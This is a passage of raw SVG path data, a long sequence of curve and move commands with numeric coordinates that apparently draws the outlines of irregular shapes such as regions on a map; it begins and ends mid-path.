762.37654,273.9719 C 760.79444,274.49775 755.59134,275.64102 750.8141,276.5125 C 743.65394,277.81868 741.76562,277.87058 740.0641,276.80796 C 738.92884,276.09898 738,275.17715 738,274.75945 C 738,274.34175 737.64643,274 737.21429,274 C 736.78214,274 736.42857,274.98824 736.42857,276.19608 C 736.42857,279.71276 741.31032,283.52034 747.72488,285.00679 C 750.9012,285.74283 753.69863,286.50355 753.94141,286.69727 C 754.18418,286.89098 751.94955,289.51335 748.97557,292.52474 C 745.51348,296.03038 742.73398,298 741.24898,298 C 738.55975,298 734.25496,300.4691 731.77224,303.43558 C 729.97887,305.57838 729.37796,314.07269 730.67638,318.92626 C 731.27568,321.16647 731.38467,321.20481 732.09773,319.42626 C 732.52248,318.36682 735.57558,315.025 738.88239,312 z M 699.08179,318 C 704.78406,318 705,317.90541 705,315.40773 C 705,313.98198 705.87546,311.7025 706.94546,310.34221 C 708.8549,307.91475 708.85609,307.8117 707.01005,304.77613 C 705.28834,301.94501 700,299.79756 700,301.92955 C 700,302.36576 698.93805,302.51965 697.64011,302.27154 C 695.8881,301.93662 695.14269,302.34637 694.74627,303.86226 C 694.4526,304.98527 694.72705,306.08895 695.35616,306.31488 C 696.07456,306.57286 695.68791,307.61353 694.31661,309.11282 C 690.58925,313.18808 688.71099,319.70862 691.58179,318.60699 C 692.45177,318.27314 695.82677,318 699.08179,318 z M 625,309.5 C 625,308.56667 624.05556,308 622.5,308 C 620.07213,308 619.30706,308.97373 620.66667,310.33333 C 621.92464,311.59131 625,310.9999 625,309.5 z M 951,308.43426 C 951,308.1231 950.48083,306.89844 949.8463,305.7128 C 949.21176,304.52716 948.74739,302.09951 948.81436,300.31803 C 948.96754,296.24331 946.68502,293.83667 943.25683,294.45832 C 941.56296,294.76547 940.21253,294.33519 939.35132,293.21391 C 938.26942,291.80531 938.2716,292.31296 939.36354,296.06375 C 941.17468,302.28497 942.04363,303.63714 946.04692,306.46378 C 949.49944,308.90153 951,309.4985 951,308.43426 z M 642,305.57713 C 642,305.05561 641.06242,303.63089 639.91649,302.41111 C 636.69461,298.98158 635.88369,293.79581 638.11539,290.89328 C 640.5779,287.69055 640.46495,286.39104 637.5,283.81305 C 634.29393,281.02541 634.29749,279 637.50847,279 C 639.76771,279 639.89269,278.80102 638.7663,276.99739 C 637.13941,274.39234 635.87894,274.87392 633.8425,278.8786 C 632.93088,280.67132 631.46838,282.92996 630.5925,283.89779 C 629.71663,284.86562 628.98569,286.29705 628.9682,287.07874 C 628.89934,290.15608 624,293.96724 624,290.94346 C 624,289.38517 618.21502,293.06977 617.72608,294.93948 C 617.49704,295.81533 617.65834,297.42475 618.08454,298.51597 C 618.51073,299.60719 618.90537,300.05 618.96152,299.5 C 619.01767,298.95 619.71461,299.36026 620.51027,300.41169 C 621.30594,301.46312 621.71813,303.27488 621.42625,304.43783 C 620.91094,306.49098 621.20148,306.5519 631.44778,306.53882 C 637.42237,306.5312 642,306.11401 642,305.57713 z M 643.53101,304.05017 C 642.85526,302.95679 646.06891,301 648.54034,301 C 649.45984,301 651.09708,299.875 652.17866,298.5 C 654.42261,295.64728 655.30389,295.44675 657.21183,297.35469 C 659.2311,299.37396 664.80289,299.95604 665.47006,298.21742 C 665.79002,297.38362 666.68822,297.05012 667.63518,297.4135 C 668.52525,297.75505 669.85175,297.538 670.58294,296.93116 C 671.31414,296.32432 672.35101,296.0989 672.8871,296.43022 C 673.42319,296.76154 674.09808,296.65031 674.38687,296.18304 C 674.67566,295.71577 676.28176,295.53451 677.95597,295.78023 C 679.793,296.04985 681,295.78548 681,295.1135 C 681,294.50107 680.325,294 679.5,294 C 678.675,294 678.1125,293.63365 678.25,293.1859 C 678.63454,291.93367 672.70937,286.35992 670.11999,285.53808 C 668.40838,284.99484 667.95582,284.27696 668.35724,282.74192 C 669.01163,280.23952 667.43943,277 665.57057,277 C 664.82309,277 662.76633,278.35 661,280 C 659.23367,281.65 657.03542,283 656.115,283 C 655.19459,283 653.79284,283.9 653,285 C 652.20716,286.1 650.60782,287 649.44591,287 C 648.28399,287 647.03405,287.29928 646.66827,287.66507 C 646.30248,288.03085 644.77327,288.46127 643.27001,288.62154 C 637.65409,289.22029 636.23918,296.00266 640.55089,301.65561 C 642.85904,304.68175 644.96929,306.37736 643.53101,304.05017 z M 726.37323,300.51784 C 727.5136,299.65427 729.36738,299.32348 731.11155,299.67231 C 732.91991,300.03398 734.89004,299.64684 736.45314,298.62266 C 737.81521,297.7302 739.97488,297 741.25241,297 C 742.7055,297 745.35626,295.19173 748.33216,292.17041 L 753.08913,287.34081 L 747.34215,285.96213 C 741.07334,284.45827 734.52389,279.68312 735.44342,277.28686 C 735.84225,276.2475 735.45541,276.03807 733.99371,276.502 C 731.75126,277.21372 731.29488,275.18605 732.98622,272.02575 C 733.78782,270.52795 733.29565,269.58876 730.3571,267.00868 C 726.9814,264.04478 726.36919,263.87027 721.12088,264.37598 C 718.0294,264.67386 715.1625,264.93613 714.75,264.95879 C 714.3375,264.98146 714.08916,265.3375 714.19813,265.75 C 714.59091,267.2369 712.89443,270.82653 711.55623,271.34005 C 710.80403,271.6287 709.88454,273.24919 709.51292,274.94116 C 709.14131,276.63312 708.45215,277.77945 707.98147,277.48855 C 707.51078,277.19765 706.72583,278.88122 706.23712,281.22982 C 705.74051,283.61643 704.83059,285.38973 704.17428,285.25 C 702.21788,284.83349 702.84122,285.99552 706,288.65345 C 707.65,290.04184 709,291.82691 709,292.62028 C 709,293.41365 709.675,294.32179 710.5,294.63837 C 711.325,294.95496 712,295.78835 712,296.49036 C 712,297.19237 712.7875,298.01464 713.75,298.31764 C 714.7125,298.62064 717.3,299.55337 719.5,300.39038 C 724.39162,302.25144 724.09133,302.24587 726.37323,300.51784 z M 705.18023,299.28284 C 705.76579,298.57728 707.31479,298 708.62244,298 C 709.9301,298 711,297.55 711,297 C 711,296.45 710.58032,296 710.06739,296 C 709.55445,296 708.86609,295.15345 708.5377,294.11878 C 707.74338,291.6161 704.54911,288 703.1327,288 C 701.50988,288 701.73098,285.04046 703.4017,284.39935 C 704.17264,284.10351 705.08455,282.36285 705.42817,280.53121 C 705.77178,278.69958 706.71602,276.65065 707.52646,275.97804 C 708.33691,275.30543 709,274.27671 709,273.69201 C 709,273.1073 709.98016,271.58557 711.17812,270.3104 C 712.42202,268.98633 713.48387,266.3852 713.6538,264.24594 C 714.30139,256.0934 715.0823,254.16696 718.17677,253.08822 L 721.14456,252.05365 L 718.57228,249.48137 C 717.00311,247.9122 716,245.7888 716,244.03633 C 716,238.0424 716.64785,238.22109 694.43338,238.08778 L 674,237.96516 L 674,241.48258 C 674,243.94251 673.54903,245 672.5,245 C 671.3,245 671,246.5 671,252.5 C 671,259.20476 670.79831,260 669.09783,260 C 667.87156,260 666.7572,261.15484 665.96173,263.25 C 663.94519,268.56134 663.99626,269.10463 667.10005,275.36037 C 668.73696,278.65958 669.86405,281.9119 669.6047,282.58776 C 669.3405,283.27625 670.20319,284.08516 671.56657,284.42735 C 672.90496,284.76327 674,285.46139 674,285.97875 C 674,286.4961 675.8,288.58481 678,290.62033 C 680.2,292.65584 682,294.87584 682,295.55364 C 682,297.1472 684.78253,298.35448 688.18876,298.2388 C 689.66758,298.18858 691.41389,298.79378 692.06945,299.58368 C 693.56264,301.38287 703.62906,301.15188 705.18023,299.28284 z M 559,296.04969 C 559,294.97702 558.22374,293.66496 557.27498,293.13401 C 555.44437,292.10955 554.87728,287.94973 556.41667,286.83798 C 557.90135,285.76573 557.47061,280.7387 555.51407,276.30411 C 553.82865,272.48402 553.43015,272.19761 550.0974,272.41107 C 548.11883,272.5378 545.00599,272.2423 543.17998,271.7544 C 540.3246,270.99147 539.51488,271.21239 537.39434,273.33293 L 534.92873,275.79854 L 537.82881,278.97372 C 539.98571,281.33522 540.86917,281.78332 541.27631,280.72232 C 542.16657,278.40235 547.34204,279.13995 548.48713,281.75 C 549.03005,282.9875 550.21507,284 551.1205,284 C 552.02593,284 553.04451,284.7875 553.38401,285.75 C 553.72351,286.7125 554.2636,288.06281 554.5842,288.75068 C 554.96809,289.57433 554.62839,289.79463 553.5893,289.3959 C 552.7215,289.06289 552.24124,288.41868 552.52206,287.96431 C 552.80287,287.50995 552.52989,286.82749 551.91545,286.44774 C 550.85504,285.79238 546.12059,289.5484 547.05556,290.30328 C 551.08759,293.5587 557.48593,298 558.1438,298 C 558.61471,298 559,297.12236 559,296.04969 z M 615.87482,296.57736 C 616.51161,296.18381 616.81628,295.51176 616.55187,295.08393 C 615.97714,294.15399 621.06924,289.32881 622.5,289.4476 C 623.05,289.49326 624.07193,289.89362 624.77096,290.33728 C 625.63987,290.88877 626.52714,290.0931 627.57583,287.82197 C 629.71659,283.18577 633.21262,277.52753 635.4939,275.00674 C 636.78096,273.58455 637.05715,272.64921 636.32592,272.18895 C 635.72391,271.81003 635.04008,270.6 634.80629,269.5 C 634.56076,268.34475 633.77274,267.67092 632.94061,267.90465 C 630.6053,268.56062 617.97324,269.2369 612.51261,268.9983 C 610.93569,268.9294 610.82129,268.72848 611.95873,268.02551 C 612.82012,267.49314 614.16977,267.55568 615.34045,268.1822 C 616.71603,268.91839 618.34845,268.88119 620.89433,268.05564 C 622.87745,267.41258 626.05814,267.02449 627.96254,267.19322 C 631.05506,267.46722 631.6055,267.12598 633.11336,264 C 634.04191,262.075 635.97127,259.40906 637.40082,258.07569 C 639.47573,256.14037 640,254.71834 640,251.02569 C 640,248.48156 640.52937,245.87063 641.17637,245.22363 C 642.0782,244.3218 641.99285,243.63333 640.81068,242.27363 C 639.96255,241.29813 638.96999,239.2441 638.60499,237.7091 C 638.24,236.17411 637.55139,235.15922 637.07476,235.4538 C 636.59813,235.74837 634.92382,235.31955 633.35408,234.50085 C 631.78434,233.68216 629.88386,233.00955 629.13081,233.00616 C 627.60276,232.99929 617.8923,238.63218 611,243.52358 C 608.525,245.28006 605.2625,247.01439 603.75,247.37764 C 601.17431,247.99624 601,248.37775 601,253.39661 C 601,256.50622 600.47539,259.15684 599.75,259.71234 C 599.0625,260.23881 595.91379,261.22589 592.75286,261.90586 C 587.53229,263.02888 587.1003,263.31889 588.03804,265.07108 C 588.60582,266.13198 589.50453,267 590.03518,267 C 590.56583,267 590.8875,267.54205 590.75,268.20455 C 590.6125,268.86705 591.025,269.42955 591.66667,269.45455 C 592.30833,269.47955 593.17083,269.8375 593.58333,270.25 C 595.08232,271.74898 597.98994,270.94499 599.5211,268.60814 C 600.38307,267.29261 602.30115,265.98442 603.78351,265.70105 C 606.68849,265.14573 610,266.42717 610,268.10661 C 610,268.67655 609.26698,268.40983 608.37106,267.51392 C 607.47514,266.618 606.08834,266.13586 605.28927,266.44249 C 604.49021,266.74912 603.19823,267 602.41821,267 C 601.6382,267 601,267.48214 601,268.07143 C 601,268.66071 600.36219,269.78067 599.58263,270.56022 C 598.47174,271.67112 598.39971,272.59869 599.24951,274.85007 C 600.16402,277.27288 599.99454,278.19893 598.16687,280.76565 C 596.82215,282.65414 596,285.31008 596,287.7657 C 596,291.37612 596.20512,291.68345 598.34217,291.27492 C 599.63036,291.02867 601.32188,291.46473 602.10109,292.24395 C 602.88031,293.02317 604.07634,293.47455 604.75893,293.24702 C 605.53429,292.98857 606,293.8063 606,295.42621 C 606,297.87566 606.24111,297.99901 610.35851,297.65601 C 612.75569,297.45631 615.23803,296.97092 615.87482,296.57736 z M 585.10855,294.85599 C 587.52199,293.94795 587.69864,293.47422 587.47027,288.52254 C 587.33451,285.57894 586.98838,282.79021 586.70109,282.32537 C 585.60281,280.54832 588.89005,275.0657 591.43707,274.42644 C 594.63241,273.62446 594.62389,273.42543 591.25,270.05627 C 589.7375,268.54589 587.52225,266.11613 586.32723,264.65681 C 583.8653,261.6504 582.47064,261.83486 577,265.89044 C 575.075,267.31751 572.89234,268.34587 572.14965,268.17568 C 571.40695,268.00548 571.08587,268.32992 571.43612,268.89664 C 571.78638,269.46337 571.20096,270.79904 570.13519,271.86481 C 567.50418,274.49582 566.61511,277.63551 568.20932,278.66584 C 570.29222,280.01201 575.81885,279.69305 575.26865,278.25843 C 574.70904,276.79927 575.84631,276.36687 582.25,275.60407 C 586.033,275.15345 587,275.33973 587,276.51913 C 587,277.33361 586.55,278 586,278 C 585.45,278 585,277.65926 585,277.24279 C 585,276.82633 583.06234,276.6397 580.6941,276.82805 L 576.3882,277.17051 L 576.96454,281.33526 C 577.32566,283.94478 577.0293,286.54658 576.17093,288.30266 C 575.0684,290.55821 575.03846,291.67864 576.01753,294.04233 C 577.30477,297.15 578.68343,297.27339 585.10855,294.85599 z M 944,292.34099 C 944,292.09622 942.65,291.42535 941,290.85016 C 939.14833,290.20466 938,289.10755 938,287.98396 C 938,285.08744 936.90265,283 935.37998,283 C 934.28922,283 934.03292,281.54331 934.23697,276.50378 C 934.49009,270.25227 935.17601,268.60246 936.42126,271.25 C 936.74463,271.9375 936.84884,271.28505 936.65285,269.8001 C 936.20861,266.43432 938.85461,265.08069 940.76667,267.69557 C 942.66371,270.28994 944.31828,269.9467 945.74426,266.66296 C 946.89045,264.02351 947.34361,263.82594 951.49426,264.15606 C 955.79197,264.49787 956,264.39205 956,261.86419 C 956,260.40658 955.325,258.95496 954.5,258.63837 C 953.675,258.32179 953,256.97875 953,255.65383 C 953,252.32451 950.39996,250.26913 948.04713,251.73849 C 946.8895,252.46145 945.91356,252.51356 945.28595,251.88595 C 944.65833,251.25833 943.8628,251.46039 943.03517,252.45762 C 940.78617,255.1675 939.79026,254.2009 940.50042,249.99749 C 941.05284,246.72775 940.90992,246.09734 939.71974,246.55405 C 938.7902,246.91075 938.05579,246.32134 937.69083,244.92572 C 937.16197,242.90338 936.99576,242.86139 935.48798,244.36917 C 934.59102,245.26612 932.98929,246 931.92857,246 C 930.78765,246 929.96875,246.71472 929.92349,247.75 C 929.88141,248.7125 929.69623,250.2875 929.51197,251.25 C 929.32772,252.2125 929.5354,253 929.97347,253 C 931.41805,253 933.98933,257.86423 933.38173,259.4476 C 932.45569,261.86084 931.22494,261.27412 931.72508,258.65783 C 931.99771,257.23166 931.45461,255.59747 930.33641,254.47926 C 929.32638,253.46924 928.5,252.31071 928.5,251.90476 C 928.5,251.49881 928.18592,250.85259 927.80205,250.46871 C 926.83551,249.50218 929.92866,245 931.55925,245 C 932.29032,245 934.11153,243.94797 935.60639,242.66215 C 938.28505,240.35806 938.29669,240.29625 936.41215,238.38177 C 935.36047,237.31337 933.84615,235.18681 933.04701,233.65607 C 932.11171,231.86452 930.9983,231.02869 929.92201,231.31014 C 927.57039,231.92511 927.70874,227.68975 930.125,225.0962 C 932.33612,222.72285 932.47438,220.21012 930.53473,217.64986 C 928.97168,215.5867 926.54783,216.37928 927.42553,218.66654 C 927.82271,219.70156 927.47628,219.9775 926.24371,219.60786 C 923.6838,218.84016 920.68784,221.8521 918.63577,227.25639 C 917.64243,229.87241 916.41484,231.75639 915.90779,231.44301 C 914.98378,230.87194 914.04419,232.49319 913.61859,235.39296 C 913.49354,236.245 913.0782,237.25514 912.69561,237.63772 C 911.36629,238.96705 912.01438,241.10529 914.5,243.59091 C 915.875,244.96591 917.03443,246.40795 917.07651,246.79545 C 917.11859,247.18295 917.38061,248.4 917.65877,249.5 C 917.93694,250.6 918.24001,252.80678 918.33226,254.40396 C 918.51358,257.54299 921.67414,259.01274 922.66884,256.42059 C 922.96867,255.63927 923.84083,255 924.60699,255 C 925.37314,255 926,254.22487 926,253.27749 C 926,251.93367 926.37928,252.09648 927.72522,254.01808 C 928.67409,255.37279 929.58775,257.38094 929.75558,258.48065 C 929.92341,259.58036 931.21495,262.14567 932.62567,264.18134 C 934.25578,266.53359 934.88692,268.35954 934.35736,269.19128 C 933.89907,269.91108 933.47783,272.075 933.42127,274 C 933.36472,275.925 933.00556,278.87362 932.62315,280.55248 C 932.06739,282.99239 932.43655,284.19647 934.46271,286.55248 C 935.85687,288.17362 936.99811,289.8375 936.99878,290.25 C 936.99945,290.6625 937.68912,291 938.53138,291 C 939.37365,291 940.31089,291.64659 940.61414,292.43686 C 941.0887,293.67353 944,293.5911 944,292.34099 z M 871.42857,291.42857 C 872.29286,290.56429 873,289.47575 873,289.00961 C 873,287.29572 869.46951,282.02369 868.52758,282.33101 C 866.96859,282.83966 866.26654,287.26349 867.27086,290.25 C 868.32944,293.39785 869.20975,293.64739 871.42857,291.42857 z M 590.98635,287.75 C 590.97016,282.7136 590.09574,279 588.92602,279 C 588.46363,279 588.16573,281.925 588.26403,285.5 C 588.38825,290.01775 588.83269,292 589.72138,292 C 590.56111,292 590.99531,290.54119 590.98635,287.75 z M 595,287 C 595,284.25 595.37777,282 595.83948,282 C 597.55585,282 598.97749,277.07098 598.00151,274.50396 C 596.9299,271.68542 595.49865,271.25817 594.63837,273.5 C 594.32179,274.325 593.46365,275 592.73138,275 C 590.03997,275 589.14093,277.04383 590.6012,279.84264 C 591.36376,281.30419 591.99045,284.6375 591.99384,287.25 C 591.99845,290.80282 592.37806,292 593.5,292 C 594.63333,292 595,290.77778 595,287 z M 548.0766,283.71567 C 547.53928,281.08486 546.92696,280.48165 544.70992,280.39909 C 543.21946,280.34358 541.94257,280.56858 541.87238,280.89909 C 541.18271,284.14641 541.58623,286.25212 543.23793,288.02501 C 545.0453,289.96499 545.33742,290.00461 546.96616,288.53063 C 548.28562,287.33653 548.56696,286.11661 548.0766,283.71567 z M 643.32939,287.33728 C 643.69389,286.97278 645.42799,286.51736 647.18295,286.32523 C 648.93791,286.13311 651.20721,285.08134 652.22585,283.98796 C 653.24448,282.89458 654.92038,282 655.95006,282 C 656.97974,282 658.95816,280.65 660.34655,279 C 661.73493,277.35 663.57493,276 664.43544,276 C 666.47235,276 666.40912,275.38329 664.02955,272.04149 C 662.94579,270.51951 662.35739,268.97594 662.72198,268.61135 C 663.08657,268.24676 663.52275,267.04503 663.69126,265.94085 C 664.13397,263.03989 666.99982,259 668.61501,259 C 669.64946,259 670,257.39426 670,252.65568 L 670,246.31136 L 656.40676,239.61789 C 641.3253,232.1916 638.37352,231.7921 639.55085,237.33657 C 639.92031,239.07646 640.92687,241.29813 641.78767,242.27363 C 642.98748,243.63333 643.0782,244.3218 642.17637,245.22363 C 641.52937,245.87063 641,248.47581 641,251.01291 C 641,254.80458 640.48031,256.12371 638.08091,258.42249 C 633.85246,262.4736 633.27419,265.81852 636.35352,268.41435 C 639.008,270.65205 641.25835,275.89574 638.95263,274.47072 C 637.48156,273.56156 638.41585,275.46557 640.80709,278.25 C 642.19357,279.86445 642.0656,280 639.15499,280 C 635.60621,280 635.02533,281.408 637.93228,282.96375 C 638.99503,283.53252 640.15035,284.89835 640.49966,285.99894 C 641.14884,288.04431 642.14922,288.51744 643.32939,287.33728 z M 860,283.78018 C 860,283.1742 861.29303,281.51326 862.87341,280.0892 C 865.9073,277.35538 866.82615,273.98572 867.26067,264 C 867.43977,259.88415 867.87749,258.5 869,258.5 C 869.825,258.5 870.95,258.01551 871.5,257.42335 C 872.05,256.83119 874.525,254.80887 877,252.92931 C 879.475,251.04974 882.32016,248.49673 883.32258,247.25596 C 884.325,246.01518 885.71775,245 886.41759,245 C 887.77633,245 891.83974,240.99688 891,240.48558 C 890.46503,240.15985 894.83269,236.49776 896.5,235.87407 C 897.05,235.66833 897.38229,235.14688 897.23843,234.71528 C 897.09456,234.28369 896.85654,233.15869 896.7095,232.21528 C 896.56245,231.27188 896.1162,229.97811 895.71783,229.34024 C 895.31945,228.70238 895.21524,227.57738 895.48625,226.84024 C 896.28124,224.6779 894.69399,223.15057 890.97421,222.49855 C 889.06339,222.16361 886.19336,221.23941 884.59636,220.44478 C 882.99936,219.65015 880.48686,219 879.01303,219 C 877.5392,219 875.99583,218.6625 875.58333,218.25 C 875.17083,217.8375 874.53333,217.48114 874.16667,217.45808 C 873.8,217.43503 872.0375,216.63597 870.25,215.6824 C 866.61962,213.74572 866.13831,211.89693 868.75,209.92067 C 870.23877,208.79412 870.31341,208.8057 869.25,209.99823 C 867.32553,212.15636 867.74478,213.55587 870.75,215.00541 C 874.23275,216.68528 875.61556,217.07804 880.25,217.70376 C 882.3125,217.98223 884,218.57705 884,219.02558 C 884,219.84477 889.41414,221.44663 891.75,221.31854 C 894.49423,221.16806 894.81319,220.93358 894.56367,219.25 C 894.42102,218.2875 893.67334,217.47531 892.90215,217.44512 C 888.70286,217.28078 884.06791,215.71192 881.94867,213.73756 C 880.62772,212.5069 879.53638,211.65411 879.52347,211.84247 C 879.4633,212.72046 874,209.55237 874,208.63948 C 874,207.94139 873.64738,207.95262 872.92634,208.67366 C 872.16146,209.43854 870.73737,209.20847 867.97464,207.87366 C 865.84173,206.84315 863.62487,206 863.04831,206 C 862.47174,206 862,205.3618 862,204.58179 C 862,203.80177 861.72686,202.45177 861.39301,201.58179 C 861.05339,200.69675 861.29963,200 861.95203,200 C 862.59455,200 862.8012,200.56119 862.41231,201.25 C 861.87734,202.19756 862.00646,202.22353 862.94594,201.35736 C 863.89123,200.48583 863.91506,199.70981 863.0464,198.08669 C 862.42001,196.91628 862.17988,195.51797 862.51277,194.97933 C 862.84567,194.4407 862.57859,194 861.91926,194 C 861.25993,194 860.10805,193.2125 859.35951,192.25 C 858.11328,190.64755 857.91583,190.63728 857.01772,192.12824 C 856.26802,193.3728 854.85085,193.67337 851.00353,193.40379 C 846.06086,193.05747 845.97865,193.09796 846.44159,195.65095 C 846.70089,197.08086 847.8326,198.89488 848.95652,199.6821 C 851.38369,201.38215 851.61992,203 849.44098,203 C 848.58352,203 848.14781,203.43015 848.47273,203.95588 C 849.5978,205.77628 838.94893,217.03527 835.78284,217.37283 C 831.76285,217.80143 830.87429,218.79401 832.27048,221.29636 C 832.94672,222.50836 833.80182,223.72951 834.17072,224.01002 C 834.53961,224.29053 835.15089,225.75303 835.52912,227.26002 C 836.19392,229.90878 836.08201,230 832.16743,230 C 829.94026,230 827.87143,230.39901 827.57003,230.88669 C 826.66254,232.35504 829.7577,234.21168 831.95201,233.51523 C 834.56311,232.6865 834.54831,233.41126 831.90382,235.87497 L 829.80765,237.82786 L 832.35486,239.49686 C 835.43026,241.51194 839,240.67164 839,237.93261 C 839,236.72959 839.68784,236 840.82203,236 C 842.31405,236 842.61626,236.74431 842.49058,240.10944 C 842.3629,243.52805 843.43844,252.60094 844.43359,256.5 C 844.57396,257.05 845.65883,259.67481 846.84441,262.33291 C 848.02998,264.991 849,267.63789 849,268.21487 C 849,268.79185 849.84869,270.66705 850.88598,272.38197 C 851.92327,274.09688 853.10731,276.625 853.51717,278 C 855.16935,283.54261 860,287.84969 860,283.78018 z M 957.5,279.7 C 957.5,279.04 959.65899,277.81678 962.29776,276.98173 C 968.12492,275.13771 968.96501,273.94003 968.98469,267.44841 C 968.99888,262.76597 968.65289,262.03969 964.25,257.50974 C 961.6375,254.82185 959.5,252.33792 959.5,251.9899 C 959.5,251.64188 958.73162,250.58876 957.79249,249.64963 C 955.98346,247.8406 956.39325,245.07676 958.67459,243.70031 C 959.40356,243.26048 960,242.24798 960,241.45031 C 960,240.65264 960.7875,239.98632 961.75,239.96959 C 963.41667,239.94063 963.41667,239.89065 961.75,238.9199 C 960.7875,238.3593 960,237.30046 960,236.56694 C 960,235.83342 959.2125,234.95549 958.25,234.61599 C 957.2875,234.27649 955.87486,233.71562 955.1108,233.36962 C 954.2987,233.00187 953.98476,233.16632 954.35506,233.76548 C 955.20188,235.13566 953.09977,235.84886 949.19405,235.51651 C 947.43732,235.36703 946,235.63966 946,236.12236 C 946,236.60506 945.36713,237 944.59362,237 C 943.6474,237 943.37097,237.7026 943.74878,239.14735 C 944.24973,241.06297 944.01475,241.22052 941.57138,240.60727 C 939.77723,240.15697 939.05416,240.27861 939.47523,240.95992 C 939.82877,241.53196 939.52898,242.03553 938.80902,242.07895 C 937.87634,242.1352 937.84323,242.29752 938.69382,242.64356 C 939.35043,242.91067 939.63272,243.79354 939.32114,244.6055 C 938.96982,245.52102 939.27605,245.97129 940.12732,245.79089 C 941.11403,245.58179 941.46767,246.55736 941.38502,249.26039 C 941.29027,252.35904 941.51397,252.81833 942.65621,251.87036 C 943.4186,251.23763 945.68162,250.57285 947.68515,250.39307 C 951.72803,250.03029 953.91369,251.89378 953.9682,255.75 C 953.98684,257.0692 954.62053,258 955.5,258 C 956.55728,258 957,259.06916 957,261.62244 C 957,264.60751 957.24541,265.04122 958.39474,264.08736 C 959.16185,263.45072 960.37262,263.05812 961.08535,263.21491 C 963.45143,263.73544 963.10838,260.43631 960.48557,257.44677 C 959.06366,255.82605 957.17335,253.30085 956.28487,251.83521 C 955.39639,250.36958 953.51083,248.64252 952.09472,247.9973 C 949.65481,246.8856 949.61634,246.75371 951.36013,245.47862 C 953.28271,244.07279 952.67551,241.5268 950.60696,242.32058 C 949.95205,242.57189 948.76007,242.26507 947.95811,241.63876 C 946.25627,240.30965 945.31142,236.4564 946.93312,237.45866 C 947.5199,237.82132 948,238.76648 948,239.55902 C 948,240.39598 948.96409,241 950.3,241 C 952.8447,241 955,242.69672 955,244.7 C 955,245.415 954.27741,246 953.39424,246 C 952.20877,246 952.53594,246.75506 954.64424,248.88482 C 960.41329,254.71258 964.15081,259 963.46208,259 C 963.07325,259 963.23447,259.57759 963.82035,260.28354 C 964.48565,261.08517 964.54352,262.11767 963.9745,263.03354 C 963.4734,263.84009 963.31989,266.11395 963.63338,268.08656 C 964.15394,271.36225 963.94033,271.78208 961.16892,272.93003 C 959.23255,273.7321 958.32981,274.69591 958.67424,275.59346 C 959.02463,276.50657 958.5282,277 957.25917,277 C 955.75381,277 955.28385,277.72126 955.21517,280.13701 C 955.14634,282.55784 955.39697,283.00303 956.31299,282.08701 C 956.96584,281.43416 957.5,280.36 957.5,279.7 z M 563.76015,276.64824 C 564.34812,276.28485 565.05709,276.55284 565.33564,277.24377 C 565.64118,278.00163 565.87342,277.80575 565.92105,276.75 C 565.96447,275.7875 566.94667,274.05333 568.1037,272.8963 C 569.26074,271.73926 570.31614,270.05176 570.44903,269.1463 C 570.58193,268.24083 571.32276,267.5 572.09533,267.5 C 572.8679,267.5 574.32694,266.67306 575.33765,265.66235 C 577.8623,263.1377 583.77346,260.79332 585.90707,261.4705 C 586.87521,261.77778 590.32968,261.42638 593.58366,260.68961 L 599.5,259.35003 L 599.79682,253.77832 C 600.05511,248.92996 599.86037,248.22566 598.29682,248.35331 C 597.13512,248.44815 596.59698,247.91141 596.77436,246.83481 C 596.9614,245.69962 596.10054,244.96136 594.06969,244.51531 C 592.43122,244.15544 590.83419,243.10478 590.52073,242.1805 C 589.59426,239.44867 570.02923,228 566.28719,228 C 564.13885,228 563.21011,228.41716 563.50427,229.25 C 563.7471,229.9375 564.63339,236.20177 565.47381,243.1706 C 566.31422,250.13944 567.2217,256.43944 567.49041,257.1706 C 568.56402,260.09183 566.42697,260.87418 556.84601,261.06743 C 551.55824,261.17408 546.72971,260.95098 546.11594,260.57166 C 545.50217,260.19233 544.94257,260.47102 544.87238,261.19098 C 544.80218,261.91094 544.63863,263.5125 544.50891,264.75 C 544.3792,265.9875 544.5894,267 544.97602,267 C 545.36264,267 546.15872,268.05293 546.74507,269.33984 C 547.77789,271.60663 550.27142,272.18635 552.65427,270.71367 C 553.9658,269.90311 555.48415,271.51302 556.88626,275.20085 C 557.63706,277.17561 558.49014,277.77008 560.28966,277.57255 C 561.61046,277.42756 563.17218,277.01162 563.76015,276.64824 z M 954.75,276.36971 C 955.9875,276.03808 957,275.19882 957,274.50469 C 957,273.81056 958.35,272.68345 960,272 C 963.32309,270.62353 963.81226,268.39114 961.43718,265.44113 C 960.35144,264.09256 959.71783,263.87449 959.36159,264.72677 C 958.99685,265.59939 957.17002,265.77807 953.0334,265.3457 C 947.81054,264.79981 947.15332,264.94156 946.58352,266.73685 C 946.23457,267.83629 946.48319,270.03277 947.13601,271.61792 C 947.78884,273.20306 948.25569,274.82131 948.17348,275.21401 C 948.09126,275.60672 948.69359,275.67107 949.512,275.35702 C 950.3304,275.04297 951,275.28417 951,275.89301 C 951,277.14933 951.57033,277.22183 954.75,276.36971 z M 737,272.3697 C 738.2908,271.31826 738.22106,271.1724 736.5,271.32392 C 734.25753,271.52135 733.03812,272.79023 733.01531,274.95 C 733.00219,276.19222 733.17912,276.19878 734.25,274.99578 C 734.9375,274.22346 736.175,273.04172 737,272.3697 z M 536.22504,271.87211 C 535.82627,271.49922 534.6,270.94197 533.5,270.63378 C 532.4,270.32559 534.54271,270.23051 538.26158,270.42249 C 545.27288,270.78445 547.03198,270.10136 544.5,268 C 543.68711,267.32536 543.2581,266.39141 543.54663,265.92455 C 543.83517,265.45768 542.30788,263.25867 540.15264,261.03785 C 537.04739,257.8381 535.50848,257 532.73834,257 C 529.79049,257 529.04624,257.47416 527.98943,260.02552 C 526.90184,262.6512 526.97658,263.31664 528.55501,265.06079 C 529.55535,266.16615 531.00046,266.83007 531.76637,266.53616 C 533.70276,265.79309 538.10753,267.01699 537.4318,268.11034 C 537.1269,268.60369 535.8126,268.74009 534.51115,268.41344 C 533.2097,268.0868 531.32478,268.29646 530.32244,268.87936 C 529.24298,269.50711 529.03367,269.95158 529.80902,269.96959 C 530.52898,269.98632 530.83303,270.46115 530.48469,271.02478 C 530.13635,271.5884 530.22229,271.98511 530.67567,271.90636 C 532.96969,271.50785 534.15988,272.14098 533.64399,273.48537 C 533.16925,274.72251 533.39787,274.76847 535.01204,273.76041 C 536.07796,273.09473 536.62381,272.24499 536.22504,271.87211 z M 637.5,270 C 636.70806,268.71862 636,268.71862 636,270 C 636,270.55 636.47656,271 637.05902,271 C 637.64148,271 637.83992,270.55 637.5,270 z M 736.66664,263.27548 C 735.89056,261.74897 735.56462,259.64646 735.94235,258.60324 C 736.43314,257.24779 735.68457,255.67817 